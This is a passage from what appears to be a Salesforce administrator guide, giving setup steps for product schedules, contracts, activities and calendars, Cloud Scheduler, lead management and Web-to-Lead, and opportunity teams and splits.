“Read,” “Create,” “Edit,” and “Delete” on products

AND

“Read,” “Create,” “Edit,” and “Delete” on price books

To set up product schedules:

Create default revenue and quantity schedules for products. In addition, administrators can enable schedule settings that allow
users to create schedules for individual products on opportunities.

Quantity Schedule

Outlines the dates, number of units (i.e., quantity), and number of installments for billing or shipping a product. Your
organization can decide exactly how to use quantity schedules.

Revenue Schedule

Outlines the dates, revenue amounts, and number of installments for billing or recognizing revenue from a product.
Your organization can decide exactly how to use revenue schedules.
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Default Schedule

A schedule associated with a product in a price book. Administrators can establish a default quantity schedule, a default
revenue schedule, or both. Every time the product is added to an opportunity, the default schedules are used. On any
particular opportunity, users can override the default schedules.

See Also:
Products, Price Books, and Schedules Overview

Enabling Schedules
Available in: Professional, Enterprise, Unlimited, and Developer Editions

To enable schedules for your organization:

1. From Setup, click Customize  > Products  > Schedule Setup.
2. Select the appropriate checkboxes to enable quantity and revenue schedules for your organization. Note that disabling a

schedule type automatically deletes all existing schedule information from products.

For a definition of each schedule type, see Setting Up Product Schedules on page 1522.

3. For each schedule type you enable, select whether to automatically enable that schedule type for every product in your price
books. This option automatically selects the Quantity Scheduling Enabled or Revenue Scheduling Enabled
checkboxes on every product in your price books.

4. Click Save.

For greater control of schedules on a product-by-product basis, administrators can also determine which schedule types users
can establish for each product.

Note:  Enabling or disabling schedules does not affect archived products.

If schedules are referenced in Apex, only one of the schedule types (quantity or revenue) can be disabled. For example,
if Apex references the schedule object (represented as OpportunityLineItemSchedule in the code), one of the
schedule types can be disabled, but not both.

See Also:
Products, Price Books, and Schedules Overview
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Customizing Contract Settings
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To change contract settings:

Customize Salesforce to handle your internal contract management process. To access the contract settings page, from Setup,
click Customize  > Contracts > Settings. You can perform the following tasks in the Contracts Settings page.

Enabling Contract Expiration Notices

Set an option to automatically send email notifications to account and contract owners when a contract expires. To activate
these expiration notices:

1. Select the Send contract expiration notice emails... option.
2. Click Save.

Remove the check on this option and click Save to stop sending expiration notices.

Disabling Auto-Calculation of Contract End Dates

Your contracts may not have end dates or you may prefer to have users enter them manually. If so, disable auto-calculation of
contract end dates:

1. Remove the check in the Auto-calculate Contract End Date option.
2. Click Save.
3. View your page layout and field-level security settings for Contract End Date, Contract Start Date, and Contract

Term to ensure your users can read or edit them as needed.

• To enable auto-calculation, check this option and click Save. If Salesforce auto-calculates Contract End Date, it
does not display on the contracts edit page.

Note:  If Auto-calculate Contract End Date is enabled but Contract Start Date or Contract Term is empty,
Contract End Date will be blank.

Tracking History for all Statuses

The default is to track history for contracts with a status of either  In Approval Process or Activated. To track history for
contracts for all statuses:

1. Select the Track history for all statuses option.
2. Click Save.

See Also:
Contracts Overview
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CUSTOMIZING OPTIONS FOR TASKS AND EVENTS

Enabling Shared Activities
Available in: All Editions except Database.com.

User Permissions Needed

“View Setup and Configuration”To view activity settings:

“Customize Application”To customize activity settings:

After you enable Shared Activities, it can take up to 48 hours for the process to finish, depending on the volume of activities
for your organization. During this process, users can continue working with tasks and events.

1. From Setup click Customize > Activities > Activity Settings.
2. Select Allow Users to Relate Multiple Contacts to Tasks and Events.
3. Click Submit.
4. Add the Name related list to the task detail and event detail page layouts so users can see all contacts on an activity. This

is particularly important for Salesforce Classic users.

After the process for enabling Shared Activities finishes, you’ll receive a confirmation email.

Tip:  To check the status of the process for enabling Shared Activities, view the Activity Settings page. Salesforce
provides helpful messages about both the status and what you need to do if the enabling process doesn’t finish.

Important:

• When a user saves an activity in the user interface, before and after triggers set to do any of the following
aren’t supported:

◊ Modifying the whoId (Name) field,  if Shared Activities is enabled
◊ Modifying or adding an activity relation through the TaskRelation or EventRelation object, if Shared

Activities is enabled
◊ Modifying or adding an invitee relation on a group event through the Invitee object, whether or not Shared

Activities is enabled
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• If a Visualforce page uses the standard controller to display Shared Activities events, use API 26.0 or later.

See Also:
Shared Activities Overview
Learning about Differences Between Activities and Shared Activities
Understanding Shared Activities
Understanding Primary Contacts

Displaying Related Contacts on Activity Detail Pages
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To create, edit, and delete page layouts:

When you enable Shared Activities, the contact detail page displays task and event information in the Open Activities and
Activity History related lists for each related contact. For your users to make the most of Shared Activities, we recommend
that you add the Name related list to the task and event detail page layouts. This lets your users view all names related to a
specific activity on the task or event detail page. For example, if your user creates a task named “Quarterly Call” with five
contacts, the task detail page will include each contact’s name and other details on separate lines in the Name related list.

Important:  Because the contents of the Name related list aren’t fields, they don’t adhere to field-level security settings.

1. Open the relevant page layout.

• To add the related list to the task detail page layout,  from Setup, click Customize > Activities > Task Page Layouts.
• To add the related list to the event detail page layout,  from Setup, click Customize > Activities > Event Page Layouts.

2. Next to the page layout name, click Edit.
3. In the palette on the upper portion of the screen, click Related Lists. The palette displays the available related lists.
4. From the palette, drag Name to the lower portion of the screen.
5. In the palette, click Save.

See Also:
Shared Activities Overview
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Guidelines for Adding a Custom Logo to Meeting Requests
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Customize Application”To customize activity settings:

When you use a custom logo in meeting requests, the logo appears in the following locations:

• Email requests sent to invitees when you request a meeting or schedule an event

• Meeting response pages where invitees select the times they can meet

• Event response pages where invitees accept or decline the event

When you use a custom logo, keep the following in mind:

• The image must be smaller than 20 KB and formatted as a .gif, .jpeg, or .png file.

• For best results, use an image smaller than 130 pixels wide, 100 pixels high, and 72 pixels per inch. Automatic resizing
may prevent larger images from displaying correctly in some email clients.

• You must first upload your logo to the Documents tab to make it externally available.

Note:

◊ Other users can replace the logo if it's in the Shared Documents folder. To prevent unwanted changes, create
a folder accessible only to system administrators and upload the logo there.

◊ You can’t use a logo that is stored in the My Personal Documents folder or marked Internal Use Only.

• You can't delete a custom logo from the Documents tab when it's being used in meeting requests. You must first either
select another image to use as your logo or uncheck the option to display a custom logo in meeting requests.

See Also:
About Cloud Scheduler
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CUSTOMIZING ACTIVITIES

Customizing Activity Settings
The availability of these settings varies by Edition. However, most are available in All Editions.

User Permissions Needed

“View Setup and Configuration”To view activity settings:

“Customize Application”To customize activity settings:

On the Activity Settings page in Setup at Customize > Activities > Activity Settings, you can manage the following
activity-related features:

• Enable Group Tasks

• Enable Sidebar Calendar Shortcut

• Enable Creation of Recurring Events

• Enable Creation of Recurring Tasks

• Enable Activity Reminders

• Enable Email Tracking

• Show Event Details on Multi-User Calendar View

• Enable Multiday Events

• Show Custom Logo in Meeting Requests

• Show Requested Meetings in the Calendar Section on the Home Tab

• Allow Users to Relate Multiple Contacts to Tasks and Events

Enable Group Tasks

Enabled by default for all Editions except Database.com. Select this checkbox to let users assign independent copies of
a new task to multiple users.

Enable Sidebar Calendar Shortcut

Available in all Editions except Database.com. Select this checkbox to display a shortcut link to a user’s last used calendar

view in the sidebar: . In the sidebar, the calendar shortcut appears above the Recent Items component.

Enable Creation of Recurring Events

Available in all Editions except Database.com. Select this checkbox to let users create events that repeat at specified
intervals.
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Enable Creation of Recurring Tasks

Available in all Editions except Database.com. Select this checkbox to let users create tasks that repeat at specified
intervals. If you disable this setting, users can still edit the interval of an existing recurring task, but cannot create new
recurring tasks.

Enable Activity Reminders

Available in all Editions except Database.com. Select this checkbox to enable activity reminders for your organization.

Salesforce can display popup reminders for upcoming tasks and events. Reminders notify the activity assignee of an
upcoming task or event. The reminder displays in a small browser popup window when the activity assignee is logged
in to Salesforce. When a user logs in, any reminders that have not been dismissed and reminders scheduled to occur
since the last time the user logged out are shown in the reminder window.

If you disable this feature, users won’t receive reminders for tasks and events that have reminders set. In addition, users
will no longer be able to add new reminders, as well as configure default reminders. Existing settings and reminders for
tasks and events aren’t retained if you later enable reminders again. If you do this, users receive reminders for only the
tasks and events that have been created or updated since you enabled the setting again.

Enable Email Tracking

Available in Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions. By default, Salesforce
tracks outbound HTML emails if your organization uses HTML email templates. You can disable this feature to control
email tracking. If you disable email tracking, Salesforce no longer stores email tracking information for your organization.
However, the HTML Email Status related list remains on page layouts and email tracking reports remain on the Reports
tab.

Show Event Details on Multi-User Calendar View

Available in Professional, Enterprise, Unlimited, and Developer Editions. If your organization-wide calendar sharing
includes Show Details, or you’re the manager of another user in the role hierarchy, calendar views typically display the
details of users’ events when you hover your mouse over the “busy” areas of the calendar. When you select the Show
Event Details on Multi-User Calendar View checkbox, event details display on-screen rather than in
mouse-over text. This setting applies to daily, weekly, and monthly calendar views for all users.

Note:  Enabling this setting does not override calendar sharing. If a user’s calendar details are not visible to
other users because of calendar sharing restrictions or the user’s position in the role hierarchy, this setting respects
that lack of visibility.

Enable Multiday Events

Available and enabled by default in all Editions except Database.com. When this checkbox is selected, Salesforce supports
events that end more than one day (24 hours) after they start. For information on creating multiday events using the
API, see the Force.com Web Services API Developer's Guide. You can create multiday events using the API versions 13.0
and later.

Show Custom Logo in Meeting Requests

Available in all Editions except Database.com. Select this checkbox to upload a custom logo that displays in meeting
request emails and on the meeting’s Web page that invitees see when you either invite them to an event or request a
meeting with them. You can select only logos that have been uploaded to the Documents tab and made externally
available. For information about size limitations and supported file formats, see our logo guidelines.
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Show Requested Meetings in the Calendar Section on the Home Tab

Available in all Editions except Database.com. Select this checkbox to display the Requested Meetings subtab in the
Calendar on the Home tab. This subtab lists the meetings a user has requested but not confirmed. Disabling this feature
also removes the New Meeting Request button from the Calendar on the Home tab.

Allow Users to Relate Multiple Contacts to Tasks and Events

Available in all Editions except Database.com. Select this checkbox to enable Shared Activities. If your organization has
enabled Shared Activities, you can relate as many as 50 contacts to non-recurring and non-group tasks, and non-recurring
events. You assign one primary contact; all others are secondary contacts.

See Also:
Activity Overview

Managing Public and Resource Calendars
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To manage public calendars:

“Customize Application”To manage resource calendars:

In contrast to users' individual calendars, public and resource calendars are for managing group activities or shared resources.
You can create an unlimited number of calendars.

Using public calendars, a group of people can track events of interest to all of them (such as marketing events, product releases,
or training classes) or schedule a common activity (such as a team vacation calendar). For example, your marketing team can
set up an events calendar to show upcoming marketing events to the entire sales and marketing organization.

With resource calendars, multiple people can coordinate their usage of a shared resource such as a conference room or overhead
projector.

To display a list of the currently-defined public and resource calendars, from Setup, click Customize  > Activities  > Public
Calendars & Resources.

From the list page, you can perform the following tasks:

• To view the properties of a calendar, click its name in the list.

• To edit calendar properties, click Edit.
• To create a new public calendar or resource:

1. Click New.
2. Give the calendar or resource a name, and check Active.
3. Click Save.
4. To make the new calendar or resource available to others, click Sharing. Add the public groups, roles, or users with

whom you want to share the calendar.
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5. In Calendar Access, specify how to share the calendar by selecting one of the following:

ResultsSharing Model

Others can see whether given times are available, but
cannot see any other information about the nature of events
in the calendar.

Hide Details

Others can see whether given times are available, but
cannot see details of events. Other users can insert events
in the calendar.

Hide Details and Add Events

Others can see detailed information about events in the
calendar.

Show Details

Others can see detailed information about events in the
calendar and can insert events in the calendar.

Show Details and Add Events

Others can see detailed information about events in the
calendar, insert events in the calendar, and edit existing
events in the calendar.

Full Access

Note:  Users need the appropriate “Read” permission to see the related record of any activity. For example, an event
invitee who does not have “Read” permission on cases will not be able to view the case associated with the event.

See Also:
Activity Overview

Deleting a Public Calendar
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To delete a public calendar:

1. From Setup, click Customize  > Activities  > Public Calendars & Resources.
2. Click Del next to the name of the calendar you want to delete.

See Also:
Managing Public and Resource Calendars
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Setting Up Cloud Scheduler
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Customize Application”To customize page layouts and activity settings:

The New Meeting Request button is enabled by default on page layouts, which lets your users use Cloud Scheduler to request
meetings with customers. If enabled, the button displays on the Open Activities related list on the detail pages of contacts,
leads, and person accounts.

Use the following methods alone or in combination to control whether the New Meeting Request button displays on detail
page layouts. Note that the button is also available in the Calendar section on the Home tab when the Requested Meetings
subtab is enabled, and isn't affected by these add or remove actions.

Cloud Scheduler Quick Setup

To add or remove the New Meeting Request button on multiple page layouts:

1. From Setup, click Customize > Activities > Cloud Scheduler.
2. If you're adding the button and the new user interface theme isn't already enabled, you must enable it from Setup, in

Customize > User Interface.
3. Click Add Button to add the New Meeting Request button to the Open Activities related list on all eligible page layouts.

Eligible layouts have fewer than four buttons in the Open Activities related list (to prevent unintended crowding). Click
Remove Button to remove the button from all current page layouts.

Note: If you want finer control over whether the button displays on individual page layouts, consider using the manual
setup method instead of or in combination with the quick method.

Cloud Scheduler Manual Setup

To add or remove the New Meeting Request button on individual page layouts:

1. If you're adding the button and the new user interface theme isn't already enabled, you must enable it from Setup, in
Customize > User Interface. See Customizing User Interface Settings.

Users can't request meetings with customers if the new user interface theme is disabled.

2. Add or remove the New Meeting Request button to the Open Activities related list on the page layouts you want.

• Contacts
• Leads
• Person Accounts (if enabled)

For users to request a meeting with a person account, you also need to add the Email field to the page layout, which
is located in Setup at Customize > Accounts > Person Accounts > Page Layouts.
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Note:  If you have multiple page layouts and want to affect all or most of them, consider using the quick setup method
instead of or in combination with the manual method.

Cloud Scheduler Optional Settings

You can optionally enable these settings to make Cloud Scheduler even more useful to your users.

• Ask your users to install Salesforce for Outlook.

We recommend users sync their calendar events between Salesforce and Outlook so they can propose meeting times based
on their availability displayed in their Salesforce calendar.

• Add your company logo to the meeting requests sent to invitees. See Customizing Activity Settings.
• Show requested meetings in the Calendar section on the Home tab.

See Customizing Activity Settings. The Requested Meetings subtab displays by default. If you remove the New Meeting
Request button from all page layouts, we recommend you also remove the Requested Meetings subtab because your users
won't be able to request meetings.

• Enable your Partner users to request meetings using Cloud Scheduler. To enable this, the customPartner User profile must
have the correct user permission requirements on page 1533, and be active and assigned to your Partner users.

User Permission Requirements

Users must have the “Send Email” and “Edit Events” permissions to request meetings. These permissions are automatically
selected in most standard profiles.

If users don't have the required permissions, they:

• Won't see the New Meeting Request button on the Open Activities related list.
• Can't edit, reschedule, or cancel requested meetings.

Field-Level Security Requirements

In most cases, you don't need to change field-level security settings to allow users to request meetings. However, if your
organization has changed the default field-level security settings for certain profiles, refer to the following table to make sure
those changes don't prevent users from requesting meetings.

Note:  In permission sets and the enhanced profile user interface, the setting labels differ from those in the original
profile user interface and in field-level security pages for customizing fields.

DescriptionRequired Field-Level Security SettingsFieldObject

Original Profile
User Interface and
Customize Field
Pages

Permission Sets and
Enhanced Profile
User Interface

If this field isn't readable, the New Meeting
Request button doesn't display on the Open

Visible (with
Read-Only not
selected)

Read and EditNameEvent

Activities related list, and an “insufficient
privileges” message displays when trying to
change (confirm or reschedule) or view a
requested meeting.
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DescriptionRequired Field-Level Security SettingsFieldObject

Original Profile
User Interface and
Customize Field
Pages

Permission Sets and
Enhanced Profile
User Interface

If this field is readable but not editable, the
New Meeting Request button doesn't
display on the Open Activities related list,
and requested meetings open as read-only
(preventing users from confirming or
rescheduling the meeting).

By default, when a requested meeting is
confirmed, the last message sent from the

VisibleReadDescription

meeting organizer displays in the
Description field for the new event.

However, if field-level security for the
Description field isn't readable, then the
last message doesn't display in the
Description field even if field-level
security is later set to readable.

See Also:
Activity Overview

CUSTOMIZING OPTIONS FOR LEADS

Setting Up Lead Management
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Success in sales starts by building a strong pipeline of leads. A lead is a prospect who is interested in your company.

Using leads can give your sales staff instant access to the latest prospects and ensures that no leads are ever dropped. Successful
lead management helps sales and marketing manage the inbound lead process, track lead sources, and analyze return on their
marketing investment.

To get started using lead management, from Setup, click Customize > Leads:

• Click Fields to create custom lead fields that track information specific to your company. Also, map your custom lead
fields to account, contact, and opportunity fields so that the data gets converted when users convert leads. Edit the Lead
Status picklist to choose the default status for new and converted leads.
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• Click Settings to specify your default lead settings.

• Click Assignment Rules to set up lead assignment rules that automatically assign leads.

• Click Web-to-Lead to automatically capture leads from your website.

To create sales queues for leads or custom objects, from Setup, click Manage Users > Queues.

Customizing Lead Settings
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To change lead settings:

To optimize the lead management features, you must edit the lead settings to specify certain defaults.

1. From Setup, click Customize > Leads > Settings.
2. Click Edit to customize the following defaults:

DescriptionField

The user or queue to which leads will be assigned if the active
assignment rule fails to locate an owner. This applies to leads

Default Lead Owner

captured online and leads that a user manually creates or
edits with the auto-assign checkbox enabled.

Checkbox to indicate whether Salesforce sends a notification
to the default lead owner when assigning a lead to him or
her. Default Lead Owner selected must be a user.

Notify Default Lead Owner

If a user creating a new lead applies assignment rules, this
setting indicates which record type to assign to the new

Record Type Setting

record. If you want new leads to keep the creator’s record
type, check Keep the existing record type. If you
want to overwrite the creator’s record type when applying
assignment rules, check Override the existing
record type with the assignee’s default
record type.

When selected, enables the following operations when you
convert leads:

Enable Validation and Triggers from Lead
Convert

• Enforcement of universally required custom fields.
• Enforcement of validation rules. Note that if validation

rules exist for activities and you create an activity during
lead conversion, the lead converts but a task is not
created.

• Workflow actions on leads such as field updates,
automatic task assignments, and transfers. Note that
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DescriptionField

existing time-based workflow actions on leads do not get
triggered as part of lead conversion.

• Execution of Apex before triggers that fire before the
insertion of accounts, contacts, or opportunities. In
addition, execution of Apex before triggers that fire
before the update of accounts or contacts.

• Cross-object field updates on accounts and opportunities
created from the lead conversion.

Note: When Enable Validation and
Triggers from Lead Convert is selected, if
the lead conversion creates an opportunity and the
opportunity has Apex before triggers associated
with it, the triggers run immediately after the
opportunity is created, before the opportunity
contact role is created.

If your organization uses record types, you can create a lead
process that allows you to provide different Lead Status

Do Not Change Lead Status Values to New
Owner's Record Type on Lead Conversion

values for different record types. If Do Not Change Lead
Status Values to New Owner's Record Type on
Lead Conversion is selected, the Lead Status does
not change to the new owner's default value during lead
conversion. If this setting it is not selected, the Lead
Status may change during lead conversion if the new
owner's record type has a different default value for Lead
Status.

Mapping Custom Lead Fields
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To map lead fields:

When you convert a qualified lead, the information from the standard lead fields is inserted into standard account, contact,
and opportunity fields (see Lead Conversion Mapping on page 1008). If your organization has custom lead fields, you can specify
how you want that custom information converted into custom account, contact, or opportunity fields.

To specify the mapping for custom lead fields:

1. From Setup, click Customize > Leads > Fields > Map Lead Fields.
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2. For each custom lead field, choose a custom account, contact, or opportunity field into which you want the information
inserted when you convert a lead.

3. Click Save.

• Remember to map custom lead fields to other custom fields of the same data type, that is, map numeric lead fields to other
numeric fields or long text area fields to other long text area fields.

Some exceptions are:

◊ You can map between text and picklist fields. However, your data may become truncated if the mapped text field is
not large enough to hold the entire lead picklist value.

◊ You can map fields of type Text or Text Area to long text area fields

◊ You can map auto-number fields to fields of type Text, Text Area, or Picklist.

◊ Do not map custom formula fields to other formula fields or any other type of field.

• Remember to map custom lead fields of type number, currency, or percent to other number, currency, or percent fields of
exactly the same length and decimal places. For example, if your lead currency field has a length of 3 and 2 decimal places,
map it to another custom currency field with a length of 3 and 2 decimal places.

• Any standard lead picklist fields that are blank are mapped to the default picklist values for the account, contact, and
opportunity.

Note:  If you change the data type of any custom field used for lead conversion, that lead field mapping will be deleted.

See Also:
Converting Leads

Capturing Web Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up Web-to-Lead:

With Web-to-Lead, you can gather information from your company’s website and automatically generate up to 500 new leads
a day.

Your company may already have a registration or other type of page where users enter their contact information. You may also
want to create a jump page where prospects respond to a campaign. With a little extra HTML code, you can redirect that
information to Salesforce to create new leads.

See Preparing to Set Up Web-to-Lead for the steps to prepare for setting up Web-to-Lead.
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See Setting Up Web-to-Lead for the steps to set up Web-to-Lead.

See Also:
Converting Leads
Customizing Lead Settings
Assigning Leads
Displaying and Editing Leads

Preparing to Set Up Web-to-Lead
Available in: Group, Professional, Enterprise, Unlimited, and DeveloperEditions

User Permissions Needed

“Customize Application”To set up Web-to-Lead:

Before setting up Web-to-Lead, you need to:

• Create custom lead fields, if needed, and specify how they’ll map to custom account, contact, and opportunity fields during
lead conversion.

• Edit the Lead Status picklist to set the default status for new and converted leads.

• Create public email templates for the automated notification email that will be sent to prospects upon submission of each
web lead. If you plan to set up email response rules to use different email templates depending on the information submitted,
create one default template to send when none of your response rules apply.

• Create lead queues if you wish to assign incoming leads to queues.

• Customize the Lead Settings to select the default owner of leads that fail to meet the criteria in your assignment rule.

• Create an active lead assignment rule to determine how web-generated leads are assigned to multiple users or queues. If
you do not set an active assignment rule, all web-generated leads are assigned to the default owner you specify in the Lead
Settings.

See Also:
Capturing Web Leads
Setting Up Web-to-Lead
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Setting Up Web-to-Lead
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up Web-to-Lead:

To set up Web-to-Lead:

1. From Setup, click Customize > Leads > Web-to-Lead.
2. Click Edit to enable or modify the following Web-to-Lead settings:

DescriptionWeb-to-Lead Setting

Enables Web-to-Lead.Web-to-Lead Enabled

The user who will be listed as the creator of online leads and
who will appear as the sender of email responses. This user

Default Lead Creator

must have the System Administrator profile or the “Modify
All Data” and “Send Email” permissions.

The default response template to use for the email response
that is automatically sent to prospects when they submit an
online lead.

If you set up response rules to use different email templates
based on the information submitted, the default response

Default Response Template

template is used when no auto-response rules apply. Leave
this option blank if you do not wish to send emails when no
response rules apply. This template must be marked as
“Available for Use.”

3. Click Save.
4. To create a Web-to-Lead form, click Create Web-to-Lead Form on the Web-to-Lead Setup page.
5. Select fields to include on your Web-to-Lead form. Use the Add and Remove arrows to move fields between the Available

Fields list and the Selected Fields list, and use the Up and Down arrows to change the order of the fields on your form.

• Select the Campaign field (and optionally, the Campaign Member Status field) if you are using Web-to-Lead as
part of a campaign.

• For organizations using multiple currencies, add the Lead Currency field if you add currency amount fields, otherwise
all amounts will be captured in your corporate currency.

• Use a custom multi-select picklist to allow potential customers to express interest in several products.
• For organizations using lead record types, select the Lead Record Type field if you want users to select a record type

for Web-generated leads.

1539

Setting Up Web-to-LeadCustomizing Options for Leads



6. If your organization uses the Translation Workbench or has renamed tabs, select the language for the form labels displayed
on your Web-to-Lead form. The source of your Web-to-Lead form is always in your personal language.

7. Specify the complete URL to which users should be directed after they submit their information—for example, your
company's home page for a thank you page—and click Generate.

8. Copy the generated HTML code and provide it to your company's webmaster to incorporate into your website.
9. Click Finished.

To test the Web-to-Lead form, add the line <input type="hidden" name="debug" value="1"> to your code. This
line redirects you to a debugging page when you submit the form. Remove this line before releasing the Web-to-Lead page
to your website.

Leads generated from your website are initially marked with the “default status” specified by the Lead Status picklist. For
Web leads generated as part of a campaign, the member status of the new leads is set to the Member Status value specified
in the form, or to the “default” member status if the Member Status field is not included in the form.

In addition, new leads are marked as “Unread,” and are changed to “Read” when viewed or edited by the lead owner. Users
can select the My Unread Leads list view to quickly locate their new leads.

Note:  The format for date and currency fields captured online is taken from your organization’s default settings -
Default Locale and Currency Locale.

The daily limit for Web-to-Lead requests is 500. If your organization exceeds its daily Web-to-Lead limit, the Default
Lead Creator (specified in the Web-to-Lead setup page) receives an email containing the additional lead information.
See How many leads can we capture from our website? on page 1014 for additional information on Web-to-Lead limits.

If a new lead cannot be generated due to errors in your Web-to-Lead setup, Customer Support is notified of the
problem so that we can help you correct it.

Salesforce runs field validation rules before creating records submitted via Web-to-Lead and only creates records that
have valid values.

All universally required fields must have a value before a record can be created via Web-to-Lead.

Salesforce doesn’t support rich text area (RTA) fields on Web-to-Lead forms. If you use RTA fields on your forms,
any information entered in them is saved as plain text when the lead is created.

See Also:
Preparing to Set Up Web-to-Lead
Capturing Web Leads
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CUSTOMIZING SALES TEAMS

Customizing Opportunity Teams
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable team selling:

“Customize Application”To create or change custom fields:

“Customize Application”To define or change field validation rules:

“Author Apex”To define Apex triggers:

“Customize Application”To create workflow rules:

“Customize Application”To set up team roles:

“Customize Application”To add a custom button or link:

“Customize Application”To edit page layouts:

An opportunity team is a set of users that normally work together on sales opportunities. A typical opportunity team might
include the account manager, the sales representative, and a pre-sales consultant.

When team selling is enabled, you can customize opportunity teams for your organization.

• Enable team selling and select which existing page layouts will include the Opportunity Team related list. To change the
location of the related list on a particular page, customize the page layout.

• Create a custom field for the opportunity team that will appear on the Opportunity Team Member page and can be included
in opportunity team reports. You can create a maximum of 50 custom fields.

Note:  If you delete a custom field, filters that use the custom field are also deleted, and the result of assignment
or escalation rules that rely on the custom field’s data might change.

• Define and activate validation rules that opportunity team data must meet before a user can save the record.

• Define and activate Apex code that executes before or after specific data manipulation language (DML) events occur, such
as before opportunity team records are inserted into the database, or after records have been deleted.

• Create workflow rules.

• Define opportunity team roles for your organization.

• Optionally, replace existing team roles.

You can globally replace an existing value in a picklist with a new value that you’ve first created using the picklist edit page.
Replacing an existing team role affects opportunity team and account team members.
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• Add a custom button or link to the opportunity team.

• Customize the Opportunity Team Member page layout and specify which fields will appear on the Opportunity Team
Member multi-line page. You can add custom fields, buttons and links, and customizable related lists to a page layout.

• Edit the Opportunity Team related list properties on each page layout containing the Opportunity Team related list. You
can add custom fields and buttons to the related list. To display opportunity team information in a related list on a parent
page, you must create a link between the opportunity team member and the parent. For example, to display opportunity
team member information on the associated account detail page, create a custom lookup relationship field for account on
the opportunity team, add it to the Opportunity Team Member multi-line page, and then set this field to the parent
account for each opportunity team member.

• View limits that apply to the opportunity team such as the maximum number of custom fields you can define.

• Create custom report types for opportunity teams.

Note:  There are a few limitations for opportunity teams.

• You can’t create a look up from an object, such as an account, to an opportunity team member.

• Validation rules and Apex triggers aren’t supported when a user adds his or her default opportunity team on an
opportunity.

See Also:
Opportunity Teams Overview
Enabling Team Selling

Enabling Team Selling
Enabling team selling gives your users access to create and use opportunity teams on opportunities.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable team selling:

1. From Setup, click Customize > Opportunities > Opportunity Teams.
2. Click Settings.
3. Select Enable Team Selling, and click Save.
4. Select the opportunity page layouts that will display the new Opportunity Team related list.
5. To ensure that users with customized page layouts see the related list, select Append to users’ personal related

list customization.
6. Click Save.
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When team selling is enabled, you can add custom fields, custom buttons and links, validation rules, workflow rules, and Apex
triggers to opportunity teams. You can also edit opportunity team page layouts, create custom report types for opportunity
teams, and enable Opportunity Splits.

See Also:
Customizing Opportunity Teams

Customizing Opportunity Team Roles
Every opportunity team member has a role in that opportunity, like Account Manager or Sales Rep. You can customize the
opportunity team roles for your organization.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up team roles:

1. From Setup, click Customize  > Opportunities > Opportunity Teams.
2. Click Team Roles.
3. Edit the picklist values for existing team roles. (If the Opportunity Owner role exists, leave that name unchanged; it’s

needed for opportunity splits.)

Note:  Opportunity teams share roles with account teams. So if you remove an opportunity team role, that role
will no longer be listed as an account team role.

See Also:
Customizing Opportunity Teams

Replacing Opportunity Team Roles

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up team roles:

If you’ve changed your opportunity team roles, you can globally update the values in all existing records, replacing the picklist
values. From Setup, choose Customize > Opportunities > Opportunity Teams > Replace Team Roles.
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If the Opportunity Owner role exists, leave that name unchanged; it’s needed for opportunity splits.

Note:  Opportunity teams share roles with account teams. So if you remove an opportunity team role, that role will
no longer be listed as an account team role.

See Also:
Customizing Opportunity Teams

Editing Multi-Line Layouts for Opportunity Teams

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To edit multi-line layouts for opportunity teams:

You can specify which fields appear on the Opportunity Team Member multi-line page. To view this page, add a new member
to an opportunity team.

1. From Setup, click Customize > Opportunities > Opportunity Teams > Page Layouts.
2. Next to the name of an opportunity team page layout, click Edit.
3. Click Edit Multi-Line Layout in the top right corner.
4. Move fields between Available Fields and Selected Fields.

• To customize which fields display in the layout, select one or more fields in Available Fields and click Add or Remove.
• To sort fields in the layout, select one or more fields in Selected Fields and click Up or Down.
• To select multiple fields individually, use CTRL+click.
• To select multiple fields as a group, use SHIFT+click.

5. Click Save to apply your changes.

See Also:
Customizing Opportunity Teams
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Disabling Team Selling

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To disable team selling:

Note:  If Opportunity Splits is enabled, you must disable that feature before you can disable team selling. Disabling
Opportunity Splits permanently deletes all split data from your organization.

1. Delete any custom fields, custom buttons and links, page layouts, validation rules, workflow rules, or Apex triggers that
you’ve added to opportunity teams. You must also delete any custom reports that include opportunity team information
and uninstall any Apex packages that use opportunity teams.

2. From Setup, click Customize > Opportunities > Opportunity Teams.
3. Click Settings.
4. Select Disable Team Selling and click Save.
5. Select Yes at the prompt and click OK. All opportunity teams assigned to opportunities and all default opportunity teams

are permanently deleted.

Note:  You can’t disable team selling if team members are referenced in Apex. In Apex code, the Team Member
field is represented as OpportunityTeamMember.

See Also:
Customizing Opportunity Teams
Disabling Opportunity Splits

Enabling Opportunity Splits
Enhance opportunity teams to share sales credit.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable opportunity splits:

Enabling Opportunity Splits changes existing opportunity records in your organization.
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• The opportunity owner is included on each opportunity team. Because the Opportunity Owner role is essential for splits,
you can’t remove it.

• Newly created opportunity split records include a default entry for the owner, who receives 100% of revenue splits.

A script applies these changes after you enable Opportunity Splits. The script temporarily disables, triggers, workflows, and
validation rules for opportunity team records, mass reassignment of opportunity team members, and mass transfer of accounts
and opportunities. If your organization contains a lot of opportunities, the script may take several hours. While it’s running,
you can still perform other tasks in Salesforce. Automated email notifications keep you up to date on the script’s status.

Note:  You must enable team selling before you can enable opportunity splits.

